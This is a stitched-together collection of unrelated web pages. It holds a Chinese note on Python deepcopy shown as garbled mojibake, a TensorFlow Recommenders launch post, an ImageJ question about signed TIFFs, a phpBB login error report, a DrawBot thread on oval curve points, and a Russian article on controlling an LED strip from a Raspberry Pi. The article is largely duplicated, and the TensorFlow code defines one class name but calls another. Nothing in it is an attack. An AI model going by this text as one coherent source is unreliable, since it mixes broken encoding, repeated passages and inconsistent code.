æ·±æ·è´ï¼æ·è´çå 容ç¸åï¼å°åä¸ç¨ã
import copy
c = copy.deepcopy(a)
1
2
卿·±æ·è´åµå¥åè¡¨çæ¶åï¼å表ååµå¥çå表é½è¿è¡äºæ·è´ã
èç¨copy.copyçæ¶åï¼åªæ¯æ·±æ·è´äºå¤å±å表ï¼å¹¶å æå¯¹åµå¥
å表è¿è¡æ·±æ·è´ããã
import copy
a = [1, 2, 3]
b = [4, 5, 6]
c = [a, b]
d = copy.deepcopy(c)
# id(d) ï¼= id(c)
print(id(d))
print(id(c))
# 内嵌列表的地å€ä¹Ÿä¸ç›¸ç‰ã€‚
print(id(d[0]))
print(id(a))
e = copy.copy(c)
# 外层列表地å€ä¸ä¸€æ ·
print(id(e))
print(id(c))
# 内嵌列表地å€ä¸€æ ·
print(id(a))
print(id(e[0]))
copy.copy()
对äºå¯åæ°æ®ç±»ååªæ·è´ä¸å±ï¼å¯¹äºä¸å¯åæ°æ®ç±»åï¼ä¸æ·è´ï¼ç´æ¥é¥®ç¨ï¼å°å䏿 ·ï¼
copy.deepcopy()
ç头æ¢é¢ï¼ééå¤å¤é½æ¹åãï¼å°åä¸ä¸æ ·ï¼
<link rel="stylesheet" href="https://csdnimg.cn/release/phoenix/template/css/markdown_views-ea0013b516.css">
</div>
|
September 23, 2020 — Posted by Maciej Kula and James Chen, Google BrainFrom recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.At Google, we have spent the last several years exploring new deep learning techniques to …
From recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.
At Google, we have spent the last several years exploring new deep learning techniques to provide better recommendations through multi-task learning, reinforcement learning, better user representations and fairness objectives. These and other advancements have allowed us to greatly improve our recommendations.
Today, we're excited to introduce TensorFlow Recommenders (TFRS), an open-source TensorFlow package that makes building, evaluating, and serving sophisticated recommender models easy.
Built with TensorFlow 2.x, TFRS makes it possible to:
TFRS is based on TensorFlow 2.x and Keras, making it instantly familiar and user-friendly. It is modular by design (so that you can easily customize individual layers and metrics), but still forms a cohesive whole (so that the individual components work well together). Throughout the design of TFRS, we've emphasized flexibility and ease-of-use: default settings should be sensible; common tasks should be intuitive and straightforward to implement; more complex or custom recommendation tasks should be possible.
TensorFlow Recommenders is open-source and available on Github. Our goal is to make it an evolving platform, flexible enough for conducting academic research and highly scalable for building web-scale recommender systems. We also plan to expand its capabilities for multi-task learning, feature cross modeling, self-supervised learning, and state-of-the-art efficient approximate nearest neighbours computation.
To get a feel for how to use TensorFlow Recommenders, let’s start with a simple example. First, install TFRS using pip:
!pip install tensorflow_recommenders
We can then use the MovieLens dataset to train a simple model for movie recommendations. This dataset contains information on what movies a user watched, and what ratings users gave to the movies they watched.
We will use this dataset to build a model to predict which movies a user watched, and which they didn't. A common and effective pattern for this sort of task is the so-called two-tower model: a neural network with two sub-models that learn representations for queries and candidates separately. The score of a given query-candidate pair is simply the dot product of the outputs of these two towers.
This model architecture is quite flexible. The inputs can be anything: user ids, search queries, or timestamps on the query side; movie titles, descriptions, synopses, lists of starring actors on the candidate side.
In this example, we're going to keep things simple and stick to user ids for the query tower, and movie titles for the candidate tower.
To start with, let's prepare our data. The data is available in TensorFlow Datasets.
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_recommenders as tfrs
# Ratings data.
ratings = tfds.load("movie_lens/100k-ratings", split="train")
# Features of all the available movies.
movies = tfds.load("movie_lens/100k-movies", split="train")
Out of all the features available in the dataset, the most useful are user ids and movie titles. While TFRS can use arbitrarily rich features, let's only use those to keep things simple.
ratings = ratings.map(lambda x: {
"movie_title": x["movie_title"],
"user_id": x["user_id"],
})
movies = movies.map(lambda x: x["movie_title"])
When using only user ids and movie titles our simple two-tower model is very similar to a typical matrix factorization model. To build it, we're going to need the following:
TFRS and Keras provide a lot of the building blocks to make this happen. We can start with creating a model class. In the __init__ method, we set up some hyper-parameters as well as the primary components of the model.
class TwoTowerMovielensModel(tfrs.Model):
"""MovieLens prediction model."""
def __init__(self):
# The `__init__` method sets up the model architecture.
super().__init__()
# How large the representation vectors are for inputs: larger vectors make
# for a more expressive model but may cause over-fitting.
embedding_dim = 32
num_unique_users = 1000
num_unique_movies = 1700
eval_batch_size = 128
The first major component is the user model: a set of layers that describe how raw user features should be transformed into numerical user representations. Here, we use the Keras preprocessing layers to turn user ids into integer indices, then map those into learned embedding vectors:
# Set up user and movie representations.
self.user_model = tf.keras.Sequential([
# We first turn the raw user ids into contiguous integers by looking them
# up in a vocabulary.
tf.keras.layers.experimental.preprocessing.StringLookup(
max_tokens=num_unique_users),
# We then map the result into embedding vectors.
tf.keras.layers.Embedding(num_unique_users, embedding_dim)
])
The movie model looks similar, translating movie titles into embeddings:
self.movie_model = tf.keras.Sequential([
tf.keras.layers.experimental.preprocessing.StringLookup(
max_tokens=num_unique_movies),
tf.keras.layers.Embedding(num_unique_movies, embedding_dim)
])
Once we have both user and movie models we need to define our objective and its evaluation metrics. In TFRS, we can do this via the Retrieval task (using the in-batch softmax loss):
# The `Task` objects has two purposes: (1) it computes the loss and (2)
# keeps track of metrics.
self.task = tfrs.tasks.Retrieval(
# In this case, our metrics are top-k metrics: given a user and a known
# watched movie, how highly would the model rank the true movie out of
# all possible movies?
metrics=tfrs.metrics.FactorizedTopK(
candidates=movies.batch(eval_batch_size).map(self.movie_model)
)
)
We use the compute_loss method to describe how the model should be trained.
def compute_loss(self, features, training=False):
# The `compute_loss` method determines how loss is computed.
# Compute user and item embeddings.
user_embeddings = self.user_model(features["user_id"])
movie_embeddings = self.movie_model(features["movie_title"])
# Pass them into the task to get the resulting loss. The lower the loss is, the
# better the model is at telling apart true watches from watches that did
# not happen in the training data.
return self.task(user_embeddings, movie_embeddings)
We can fit this model using standard Keras fit calls:
model = MovielensModel()
model.compile(optimizer=tf.keras.optimizers.Adagrad(0.1))
model.fit(ratings.batch(4096), verbose=False)
To sanity-check the model’s recommendations we can use the TFRS BruteForce layer. The BruteForce layer is indexed with precomputed representations of candidates, and allows us to retrieve top movies in response to a query by computing the query-candidate score for all possible candidates:
index = tfrs.layers.ann.BruteForce(model.user_model)
index.index(movies.batch(100).map(model.movie_model), movies)
# Get recommendations.
_, titles = index(tf.constant(["42"]))
print(f"Recommendations for user 42: {titles[0, :3]}")
Of course, the BruteForce layer is only suitable for very small datasets. See our full tutorial for an example of using TFRS with Annoy, an approximate nearest neighbours library.
We hope this gave you a taste of what TensorFlow Recommenders offers. To learn more, check out our tutorials or the API reference. If you'd like to get involved in shaping the future of TensorFlow recommender systems, consider contributing! We will also shortly be announcing a TensorFlow Recommendations Special Interest Group, welcoming collaboration and contributions on topics such as embedding learning and distributed training and serving. Stay tuned!
September 23, 2020 — Posted by Maciej Kula and James Chen, Google BrainFrom recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.At Google, we have spent the last several years exploring new deep learning techniques to …
|
In a script, I am using IJ.openImage() to open a two-channel 16-bit signed single-slice TIF file that has been encoded with the two’s complement.
The LOCI bio-formats dialog opens, and all that is needed to do is push ‘OK’.
How can one prevent the dialog from opening in the first place?
Opening the file manually using the bio-formats API is possible. Here is one attempt at it, that works, but surely it could be simpler?
from loci.formats import ChannelSeparator
#from java.nio import ByteBuffer, ByteOrder
from fiji.scripting import Weaver
from ij.process import ShortProcessor
from ij import ImagePlus, ImageStack, CompositeImage
from jarray import zeros
# *** EDIT HERE ***
filepath = ...
# An embedded piece of java code to parse the raw bytes into signed 16-bit pixels, decoded with two's complement.
# If the two's complement wasn't needed, there would be no need for the Weaver: ByteBuffer would suffice.
arrays = [None, None]
asShorts = Weaver.inline(
"""
final byte[] bytes = (byte[])arrays.get(0);
final short[] shorts = (short[])arrays.get(1);
for (int i=0, k=0; i<shorts.length; i+=1, k+=2) {
// In little endian and with two's complement
shorts[i] = (short) (~(bytes[k+1]&0xff | (bytes[k]&0xff << 8)) + 1);
}
return null;
""", {"arrays": arrays})
# A LOCI bio-formats decoder for the TIFF file
reader = ChannelSeparator()
reader.setGroupFiles(False)
reader.setId(filepath)
width = reader.getSizeX()
height = reader.getSizeY()
# Pre-allocated array for reuse in reading each image plane
bytes = zeros(width * height * 2, 'b')
stack = ImageStack(width, height)
# Read each of the two image planes, one for each channel
for i in xrange(reader.getImageCount()):
reader.openBytes(i, bytes)
shorts = zeros(width * height, 'h') # 'h' is for short (16-bit)
# Should work, but doesn't do the two's complement, which is needed because these TIFF files are signed 16-bit.
#ByteBuffer.wrap(bytes).order(ByteOrder.LITTLE_ENDIAN).asShortBuffer().get(shorts)
# So instead we do it manually with the Weaver:
arrays[0] = bytes
arrays[1] = shorts
asShorts.call()
stack.addSlice(ShortProcessor(reader.getSizeX(), reader.getSizeY(), shorts, None))
# Show the stack as an ImageJ composite image
imp = ImagePlus("all", stack)
imp.setDimensions(2, stack.getSize() / 2, 1) # channels, slices and time frames
comp = CompositeImage(imp, CompositeImage.COMPOSITE)
comp.show()
Surely there is a simpler way?
|
I am in need of some serious help, I recently tried to change the theme on my board and it turns out I changed it to one where files were missing and couldn't use my board or UCP, after searching round here I managed to get that issue sorted by downloading new files and doing the database_update.php routine. Which worked great my board is back up and running with all my images, posts and users in check.
However to cause me further stress (like my morning hasn't been bad enough already) I now cannot login to my control panel as I get this error code.
Code: Select all
Fatal error: Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (@UNIX_TIMESTAMP()) at position 0 (@): Unexpected character' in /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php:50 Stack trace: #0 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php(50): DateTime->__construct('@UNIX_TIMESTAMP...', Object(DateTimeZone)) #1 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/user.php(720): phpbb\datetime->__construct(Object(phpbb\user), '@UNIX_TIMESTAMP...', Object(DateTimeZone)) #2 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/includes/acp/acp_main.php(462): phpbb\user->format_date('UNIX_TIMESTAMP(...') #3 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/includes/functions_module.php(674): acp_main->main('main', 'main') #4 /websites/123reg/LinuxPackage23/lf in /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php on line 50
If there is a superhero out there, please I need you more than ever here, I am losing hair by the minute
Thanks in advance to anyone who can help here.
|
Oval() point placement
ryanlast edited by
Hi there,
I'm curious as to why the output from
oval()has on-curves on angled extrema rather than traditional 0/90 extreme points? Sometimes I build patterns, export to PDF, and then work with them in Illustratorâbut this point structure makes it more difficult. Screenshot in Illustrator below.
Thanks,
Ryan
gferreiralast edited by
hello @ryan,
I dontât know why the extremes are angledâ¦
hereâs a way to get the desired result by modifying
oval:
def twist(func, angle):
def wrapper(x, y, w, h):
with savedState():
translate(x + w/2, y + h/2)
rotate(angle)
func(-w/2, -h/2, w, h)
return wrapper
oval = twist(oval, 45)
when working with
BezierPath, itâs possible to rotate the shape:
B = BezierPath()
B.oval(x, y, w, h)
B.rotate(45, (x + w/2, y + h/2))
hope this helps!
I don't know why but my wild guess is it has todo with drawing ovals at more extreme w, h ratios, when the points are on the extremes you will need a pushing point in the middle to nice curve back.
@gferreira you method only works for circles...
the drawBot RoboFont extension has points on the extremes, cause the context is type... see https://github.com/typemytype/drawBotRoboFontExtension/blob/master/DrawBot.roboFontExt/lib/glyphContext.py#L23
see the big difference when the oval is getting thinner...
def straightOval(x, y, w, h):
c = 0.55
hx = w * c * .5
hy = h * c * .5
path = BezierPath()
path.moveTo((x + w * .5, y))
path.curveTo((x + w * .5 + hx, y), (x + w, y + h * .5 - hy), (x + w, y + h * .5))
path.curveTo((x + w, y + h * .5 + hy), (x + w * .5 + hx, y + h), (x + w * .5, y + h))
path.curveTo((x + w * .5 - hx, y + h), (x, y + h * .5 + hy), (x, y + h * .5))
path.curveTo((x, y + h * .5 - hy), (x + w * .5 - hx, y), (x + w * .5, y))
path.closePath()
drawPath(path)
x, y, w, h = 10, 10, 8.0, 146.0
oval(x, y, w, h)
straightOval(x + w + 10, y, w, h)
|
Управляем светодиодной лентой при помощи Raspberry Pi и Android
Sandbox
Здравствуй, завсегдатай и гость Хабра.
Давно читаю Хабр, но всё никак не было поводов написать статью, покаменя не накрыло мне очередной раз не напомнили о существовании Raspberry Pi и о такой вещи как WS2801 LED Strip. Тут уже однажды писали о подобной, но для связи с Ардуиной, чтобы получить Эмбилайт, поэтому я решил рискнуть и написать свою статью, с Лего и Котиками.
В статье будет мало картинок, несколько видео, много текста, включая лирические отступления не по сабжу и совсем мало кода, но в самом конце будут ссылки на проект на Гитхабе. А теперь обо всём по-порядку:
Всё началось с того, что я узнал, что один коллега по работе регулярно возит Малиновые Пирожки и продаёт их с минимум наценок, особенно своим коллегам. Очередной раз услышав о пирожках, не смог устоять и приобрёл у него оный. Что это такое и что с помощью него можно сделать, рассказывать не буду, и так все знают, а кто не знает, могут поискать, статей полно. Сам я с ним поигрался недельку-другую, настроил под что мне надо было и успокоился.
Но тут тот же коллега подкинул интересную инфу: можно заказать с Ибея управляемую (адресную) "гирлянду" (+ блок питания, коннекторы и соединительные проводки на свой вкус и цвет) и простейшим способом получить DYI Ambilight как это рассказано, например, тут. Или же, можно просто играться с этой гирляндой как душе угодно: в теории она позволяла в любой момент времени зажечь любую из лампочек любым RGB цветом, а ведь об обладании такой штукой я мечтал уже несколько лет!
Не долго думая, заказал необходимые части на Ибее. Расчётный срок доставки был порядка 3х недель, так что было пока время отвлечься на подготовку к поездке в отпуск на неделю в Швецию. По возвращении ещё был неделю дома, пытался заранее найти как можно больше информации о том как гирлянду надо будет подключать, искал различные скрипты и библиотеки для написания собственных алгоритмов управления. Толкового нашлось не очень много, одна Хабра-статья, правда она про связку с Ардуиной и несколько ссылок привели на этот Python-проект. Так как задачи делать эмбилайт у меня как раз таки не было, а к Python душа не лежит (сам люблю Java + Android), полезной информации там для себя нашёл не много. Время свободное было, гирлянда никак не приезжала, решил накатать на Андроиде простенькое приложение-симулятор гирлянды и написать пару алгоритмов управления последней. Приложение было на столько простое и не менее кривое, что даже показывать никому не стал.
В последние выходные отпуска мне привезли из Новосибирска долгожданную коробку Lego 42009, которая временно затмила мои мысли о гирлянде.
Планы по сборке Лего были назначены на следующие выходные, когда, примерно, ожидался и приезд посылки из Китая. Долго думал, чего же больше я жду — торжественного открытия коробки Лего и сборка топового на данный момент набора Lego Technic или же игра с мечтой последних нескольких лет. Посылка пришла вечером в пятницу, а на утро субботы планировалось начать сборку конструктора и снятие Time-Lapse процесса сборки.
Разумеется, я не смог удержаться в пятницу вечером и попытался подключить гирлянду в Пирожку, но в виду отсутствия необходимых проводков, подключение к GPIO портам RPi'я было затруднительно. Найдя какие-то старые проводки, разобрав старую мышку, начитавшись статей в Интернетах пытался подключить гирлянду хоть как-нибудь и запустить пробные скрипты. Но всё было тщетно. При подключении питания к гирлянде зажигалась первая лампочка белым светом и всё, никаких реакций не было независимо от того, что я запускал на Пироге. Изрядно помучавшись, решил отложить дело до утра.
Утром пришёл друг-фотограф для помощи в сборке и съёмки Лего, вместе с ним также безуспешно попытались подсоединить гирлянду к Пирогу. Через час бросили это дело, пошли готовить environment квартиры к сборке Передвижного Крана.
Сборка прошла на ура, кран оправдал все ожидания, оказался даже больше, чем думал, сам процесс сборки был непростой и увлекательный. Time-lapse видео сборки можно посмотреть тут.
Так как начали позже, чем планировали, закончили ещё позже, к гирлянде не возвращались больше. Зато днём следующего дня приехал другой знакомый, который уже специалист — железячник, заодно и привёз очень нужные проводки разной длины и разъёмов для подключения гирлянды к Пирогу. Сели с ним ковыряться. Потратили часов 5, наверное и, казалось бы, безуспешно. Поначалу гирлянда не реагировала на внешние раздражители, то есть нас, никак. Потом иногда начали мигать несколько первых огоньков при касании разъёмов подключения к пирогу. Спустя час выяснили, что если замыкать пальцами провода, которые должны идти к Пирогу, то зажигаются или тухнут несколько первых огоньков гирлянды. Значит, она всё же рабочая, оставалось понять, почему же не работают скрипты. Беглый анализ Пайтоновского скрипта показал, что используется устройство
К концу дня совсем выбившись из сил, гость меня покинул, а пока он ехал домой я решил забрести в конфиг Пирога
и обнаружить главный epic fail последних пары дней, а именно, что SPI у меня был выключен…
Включил. Скрипт заработал, можно было включать-выключать все диоды белым цветом и запускать два бесконечных действия — fade (постепенное появление и угасание рандомными цветами), или же chase — последовательно бегающий огонёк из начала в конец.
Счастью не было предела. Сделал даже пару фотографий построенного Лего-крана при свете гирлянды:
Cкудные возможности скрипта быстро надоели, а написать что-то своё на Пайтоне мне было достаточно проблематично. Поэтому, было принято решение написать своё простенькое Java-приложение для Raspberry и начать это завтра. А ведь «завтра» — это был понедельник. Именно в этот понедельник я не хотел идти на работу больше, чем во все остальные понедельники ранее. Пережив понедельник, убежав с работы пораньше, повесив гирлянду под потолок, на верхний край ковра, что висит и закрывает большую дыру в обоях, в моей квартире, уселся за код, но тут меня ждал ещё один подвох, впрочем, ожидаемый.
Установив все необходимые java-пакеты решил написать Hello World, скомпилить и запустить прям на пироге. Компиляция даже такого простого приложения на Rapsberry Pi-е заняла несколько секунд, порядка 5, что уж говорить о дальнейшем коде? Это было достаточно неудобно, также как и отсутствие нормальной IDE. Поэтому было принято решение писать код на большом PC, на пирог заливать по ftp скомпилированные классы и там их уже запускать. Позже, когда проект разросся до большого количества файлов стал собирать сразу в jar-ы. Подобрались к самому интересному. Стоял главный вопрос: как заставить гирлянду зажигаться используя Джаву. Поиск в Гугле ничего не дал, находились исходники на Си с использованием библиотек и пара скриптов на Пайтоне. На последнем это выглядело так:
где
Главная идея заключалась в том, что в каждый момент времени нужно писать в файл
Возвращаясь к Java, там код записи в файл выглядит почти также (
Собственно, написав простенький класс работы с устройством, написал ещё пару классов-обёрток для различных простых действий, таких как зажечь определённую лампочку заданным цветом, зажечь всю гирлянду нужным цветом, тот же chase и fade. Днём позже прикрутил ещё визуализацию работы стека и чего-то ещё.
Но опять же, запускать эти «алгоритмы» — мало интереса и это тоже быстро надоело. Хотелось непосредственного управления. Было решено написать простенький сервер, опять же на Джаве, который принимал бы строковые данные, парсил их и взаимодействовал с гирляндой на основе присланных «команд». Для удобства было сделано так, что порт, количество лампочек в гирлянде и устройство (
Клиент, в сою очередь, на Андроиде. В первой версии клиента был минимальный функционал — включить-выключить, установить цвет с помощью RGB-ползунков и «двигать» огонёк ещё одним ползунком. Не смотря на мою нелюбовь «с детства» к клиент-серверному коду, написанный код работал и даже правильно.
Довольно быстро понял, что 50 лампочек мне будет недостаточно и заказал ещё столько же в рассчёте на то, что позже их можно будет сложить в квадрат 10х10, а это новое поле для полёта фантазии, тут можно будет делать хоть классическую змейку.
Чуть позже мой знакомый студент помог переписать клиент-серверный код под более правильную архитектуру, теперь клиент общался с сервером с помощью заранее заданного набора команд, а данными для каждой команд служил параметр типа
Переделав код под новую архитектуру, начал наращивать функционал вширь: добавлял новые элементы интерфейса и новые алгоритмы управления лампочками.
Добавилось и мерцание RGB-цветами и рандомными и радуга, в том числе двигающаяся. Был даже прикручен NFC для включения-выключения лампочек при чтении любой метки (удалено из финальной версии) Отдельно стоит упомянуть, что был прикручен Гугловый SpeechRecognizer, который был настроен на восприятие буквально 5ти команд: «красный», «зелёный», «синий», «жёлтый» и «радуга». Ну и самая, на мой взгляд, интересная функциональность — это использование всей длины гирлянды как… эквалайзера, наверное правильней сказать: количество последовательно зажжённых лампочек зависело от громкости звука, воспринимаемого микрофоном смартфона. Особенно эффектно это выглядит на примере трека
Общий обзор функциональности приложения:
После этого ещё немного побаловался с парой алгоритмов, правил найденные баги на сервере и клиенте, а также слегка рефакторил код. Сейчас главный управляющий экран выглядит так:
Весь код выложен на Гитхаб (библиотека, сервер и клиент) для неравнодушных. Буду рад, если он чем-то поможет. У самого планы сделать форк в версию 2.0, функциональность которой до конца я пока не определил для себя, но в планах примерно следующее:
Из мелочей, что забыл вовремя написать:
1. Возможно надо корректировать цвет каждого диода перед записью в файл потому, что свет получается «холодный» и отдаёт в синеву при значениях 255-255-255. В Пайтоновском скрипте, что я находил, так и делается:
2. Иконку нарисовал мне тот же человек, что помогал записывать тайм-лапс постройки Лего. В основе неё лежит фотография моей кошки-упорошки
3. Описанные действия с файлом
За код просьба сильно не пинать, опыта написания больших проектов, к сожалению, пока не имею, да и когда начинал писать код, не думал, что вырастет до такого. А ещё это первый опыт работы с Гитом и выкладка своего кода в Open-Source.
Спасибо, надеюсь было интересно.
Давно читаю Хабр, но всё никак не было поводов написать статью, пока
В статье будет мало картинок, несколько видео, много текста, включая лирические отступления не по сабжу и совсем мало кода, но в самом конце будут ссылки на проект на Гитхабе. А теперь обо всём по-порядку:
Всё началось с того, что я узнал, что один коллега по работе регулярно возит Малиновые Пирожки и продаёт их с минимум наценок, особенно своим коллегам. Очередной раз услышав о пирожках, не смог устоять и приобрёл у него оный. Что это такое и что с помощью него можно сделать, рассказывать не буду, и так все знают, а кто не знает, могут поискать, статей полно. Сам я с ним поигрался недельку-другую, настроил под что мне надо было и успокоился.
Но тут тот же коллега подкинул интересную инфу: можно заказать с Ибея управляемую (адресную) "гирлянду" (+ блок питания, коннекторы и соединительные проводки на свой вкус и цвет) и простейшим способом получить DYI Ambilight как это рассказано, например, тут. Или же, можно просто играться с этой гирляндой как душе угодно: в теории она позволяла в любой момент времени зажечь любую из лампочек любым RGB цветом, а ведь об обладании такой штукой я мечтал уже несколько лет!
Не долго думая, заказал необходимые части на Ибее. Расчётный срок доставки был порядка 3х недель, так что было пока время отвлечься на подготовку к поездке в отпуск на неделю в Швецию. По возвращении ещё был неделю дома, пытался заранее найти как можно больше информации о том как гирлянду надо будет подключать, искал различные скрипты и библиотеки для написания собственных алгоритмов управления. Толкового нашлось не очень много, одна Хабра-статья, правда она про связку с Ардуиной и несколько ссылок привели на этот Python-проект. Так как задачи делать эмбилайт у меня как раз таки не было, а к Python душа не лежит (сам люблю Java + Android), полезной информации там для себя нашёл не много. Время свободное было, гирлянда никак не приезжала, решил накатать на Андроиде простенькое приложение-симулятор гирлянды и написать пару алгоритмов управления последней. Приложение было на столько простое и не менее кривое, что даже показывать никому не стал.
В последние выходные отпуска мне привезли из Новосибирска долгожданную коробку Lego 42009, которая временно затмила мои мысли о гирлянде.
Планы по сборке Лего были назначены на следующие выходные, когда, примерно, ожидался и приезд посылки из Китая. Долго думал, чего же больше я жду — торжественного открытия коробки Лего и сборка топового на данный момент набора Lego Technic или же игра с мечтой последних нескольких лет. Посылка пришла вечером в пятницу, а на утро субботы планировалось начать сборку конструктора и снятие Time-Lapse процесса сборки.
Разумеется, я не смог удержаться в пятницу вечером и попытался подключить гирлянду в Пирожку, но в виду отсутствия необходимых проводков, подключение к GPIO портам RPi'я было затруднительно. Найдя какие-то старые проводки, разобрав старую мышку, начитавшись статей в Интернетах пытался подключить гирлянду хоть как-нибудь и запустить пробные скрипты. Но всё было тщетно. При подключении питания к гирлянде зажигалась первая лампочка белым светом и всё, никаких реакций не было независимо от того, что я запускал на Пироге. Изрядно помучавшись, решил отложить дело до утра.
Утром пришёл друг-фотограф для помощи в сборке и съёмки Лего, вместе с ним также безуспешно попытались подсоединить гирлянду к Пирогу. Через час бросили это дело, пошли готовить environment квартиры к сборке Передвижного Крана.
[лирическое отступление]
Сборка прошла на ура, кран оправдал все ожидания, оказался даже больше, чем думал, сам процесс сборки был непростой и увлекательный. Time-lapse видео сборки можно посмотреть тут.
[/лирическое отступление]
Так как начали позже, чем планировали, закончили ещё позже, к гирлянде не возвращались больше. Зато днём следующего дня приехал другой знакомый, который уже специалист — железячник, заодно и привёз очень нужные проводки разной длины и разъёмов для подключения гирлянды к Пирогу. Сели с ним ковыряться. Потратили часов 5, наверное и, казалось бы, безуспешно. Поначалу гирлянда не реагировала на внешние раздражители, то есть нас, никак. Потом иногда начали мигать несколько первых огоньков при касании разъёмов подключения к пирогу. Спустя час выяснили, что если замыкать пальцами провода, которые должны идти к Пирогу, то зажигаются или тухнут несколько первых огоньков гирлянды. Значит, она всё же рабочая, оставалось понять, почему же не работают скрипты. Беглый анализ Пайтоновского скрипта показал, что используется устройство
/dev/spidev0.0, собственно у меня в системе он присутствовал. Параллельно пытался гуглить проблему, что-то находил, применял что скажут, но безуспешно.
К концу дня совсем выбившись из сил, гость меня покинул, а пока он ехал домой я решил забрести в конфиг Пирога
raspi-config
и обнаружить главный epic fail последних пары дней, а именно, что SPI у меня был выключен…
Включил. Скрипт заработал, можно было включать-выключать все диоды белым цветом и запускать два бесконечных действия — fade (постепенное появление и угасание рандомными цветами), или же chase — последовательно бегающий огонёк из начала в конец.
Счастью не было предела. Сделал даже пару фотографий построенного Лего-крана при свете гирлянды:
Cкудные возможности скрипта быстро надоели, а написать что-то своё на Пайтоне мне было достаточно проблематично. Поэтому, было принято решение написать своё простенькое Java-приложение для Raspberry и начать это завтра. А ведь «завтра» — это был понедельник. Именно в этот понедельник я не хотел идти на работу больше, чем во все остальные понедельники ранее. Пережив понедельник, убежав с работы пораньше, повесив гирлянду под потолок, на верхний край ковра, что висит и закрывает большую дыру в обоях, в моей квартире, уселся за код, но тут меня ждал ещё один подвох, впрочем, ожидаемый.
Установив все необходимые java-пакеты решил написать Hello World, скомпилить и запустить прям на пироге. Компиляция даже такого простого приложения на Rapsberry Pi-е заняла несколько секунд, порядка 5, что уж говорить о дальнейшем коде? Это было достаточно неудобно, также как и отсутствие нормальной IDE. Поэтому было принято решение писать код на большом PC, на пирог заливать по ftp скомпилированные классы и там их уже запускать. Позже, когда проект разросся до большого количества файлов стал собирать сразу в jar-ы. Подобрались к самому интересному. Стоял главный вопрос: как заставить гирлянду зажигаться используя Джаву. Поиск в Гугле ничего не дал, находились исходники на Си с использованием библиотек и пара скриптов на Пайтоне. На последнем это выглядело так:
spidev = file("/dev/spidev0.0", "wb")
spidev.write(pixels)
time.sleep(refresh_rate/1000)
где
pixels— массив байтов, размером в 3 раза большим, чем количество лампочек в гирлянде. Каждые три элемента в массиве — это значения для RGB-каналов для каждой лампочки. Допустим, у нас есть гирлянда из 50 лампочек, чтобы её всю зажечь, нужно писать в файл/dev/spidev0.0 массив вида {R0, G0, B0, R1, G1, B1, ... R49, G49, B49}. Никаких заголовков, просто массив байтов и flush после.
Главная идея заключалась в том, что в каждый момент времени нужно писать в файл
весьмассив, даже если хочешь зажечь одну лампочку. Задержка по времени нужна для того, чтобы видеть все изменения на ленте, впрочем, её можно варьировать как угодно.
Возвращаясь к Java, там код записи в файл выглядит почти также (
try-catch опущен):
FileOutputStream spidev = new FileOutputStream(new File("/dev/spidev0.0"));
spidev.write(bytes);
spidev.flush();
Thread.sleep();
Собственно, написав простенький класс работы с устройством, написал ещё пару классов-обёрток для различных простых действий, таких как зажечь определённую лампочку заданным цветом, зажечь всю гирлянду нужным цветом, тот же chase и fade. Днём позже прикрутил ещё визуализацию работы стека и чего-то ещё.
Но опять же, запускать эти «алгоритмы» — мало интереса и это тоже быстро надоело. Хотелось непосредственного управления. Было решено написать простенький сервер, опять же на Джаве, который принимал бы строковые данные, парсил их и взаимодействовал с гирляндой на основе присланных «команд». Для удобства было сделано так, что порт, количество лампочек в гирлянде и устройство (
/dev/spidev0.0) задавались с помощью параметров при запуске сервера.
Клиент, в сою очередь, на Андроиде. В первой версии клиента был минимальный функционал — включить-выключить, установить цвет с помощью RGB-ползунков и «двигать» огонёк ещё одним ползунком. Не смотря на мою нелюбовь «с детства» к клиент-серверному коду, написанный код работал и даже правильно.
Довольно быстро понял, что 50 лампочек мне будет недостаточно и заказал ещё столько же в рассчёте на то, что позже их можно будет сложить в квадрат 10х10, а это новое поле для полёта фантазии, тут можно будет делать хоть классическую змейку.
Чуть позже мой знакомый студент помог переписать клиент-серверный код под более правильную архитектуру, теперь клиент общался с сервером с помощью заранее заданного набора команд, а данными для каждой команд служил параметр типа
Object, следовательно, там могло быть всё, что угодно. Также, для защиты от «несанкцианированного доступа», на сервер добавил поле с паролем, а на клиенте посылал его первой командой. Если он не подходил, сервер отключал клиента. Это было сделано на тот случай, если кто-то знает по какому имени/айпишнику и порту доступен мой пирожок, чтобы не смог попытаться поиграться гирляндой.
Переделав код под новую архитектуру, начал наращивать функционал вширь: добавлял новые элементы интерфейса и новые алгоритмы управления лампочками.
Добавилось и мерцание RGB-цветами и рандомными и радуга, в том числе двигающаяся. Был даже прикручен NFC для включения-выключения лампочек при чтении любой метки (удалено из финальной версии) Отдельно стоит упомянуть, что был прикручен Гугловый SpeechRecognizer, который был настроен на восприятие буквально 5ти команд: «красный», «зелёный», «синий», «жёлтый» и «радуга». Ну и самая, на мой взгляд, интересная функциональность — это использование всей длины гирлянды как… эквалайзера, наверное правильней сказать: количество последовательно зажжённых лампочек зависело от громкости звука, воспринимаемого микрофоном смартфона. Особенно эффектно это выглядит на примере трека
Caspa — Sir Rock A Lot:
Общий обзор функциональности приложения:
После этого ещё немного побаловался с парой алгоритмов, правил найденные баги на сервере и клиенте, а также слегка рефакторил код. Сейчас главный управляющий экран выглядит так:
Весь код выложен на Гитхаб (библиотека, сервер и клиент) для неравнодушных. Буду рад, если он чем-то поможет. У самого планы сделать форк в версию 2.0, функциональность которой до конца я пока не определил для себя, но в планах примерно следующее:
Выбор экрана управления: прямая лента, прямоугольник или квадрат.
